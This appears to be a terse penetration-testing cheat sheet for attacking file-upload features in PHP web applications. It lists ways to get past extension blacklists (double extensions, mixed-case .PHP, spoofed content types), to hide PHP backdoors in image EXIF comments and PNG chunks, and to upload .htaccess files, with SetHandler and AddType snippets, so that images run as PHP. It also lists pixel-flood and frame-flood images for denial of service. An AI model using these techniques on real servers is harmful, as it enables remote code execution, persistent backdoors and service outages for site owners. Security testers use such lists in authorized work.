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php --- try to upload a simple php file

upload.php.jpeg --- To bypass the blacklist.
upload.jpg.php --- To bypass the blacklist.
upload.php --- and Then Change the content type of the file to image
or jpeg.
upload.php* --- version - 1 2 3 4 5 6 7
upload.PHP --- To bypass The BlackList
upload.PhP --- To bypass The BlackList
upload.pHp --- To bypass The BlackList
upload .htaccess --- By uploading this [jpg,png] files can be executed as
php with milicious code within it.
pixelFlood.jpg --- To test againt the DOS.
frameflood.gif --- upload gif file with 10^10 Frames
Malicious zTXT --- upload UBER.jpg
upload.php [getimagesize() --- Add backdoor in comments using Exiftool and
rename the jpg file
with php so that it will be execute. This Time The
of server is only limited to contents of the uploaded
not on the extension

phppng.png --- backdoor in php chunks

xsspng.png --- backdoor in php chunks

NOTE: If you are not able to execute the .PHP file upload new .htaccess file in the
same directory with data "AddType appilication/x-httpd-php PHP"

setHandler Method [.htaccess]


<FilesMatch "_php.gif">
SetHandler application/x-httpd-php

AddType Method [.htaccess]


AddType application/x-httpd-php .lol

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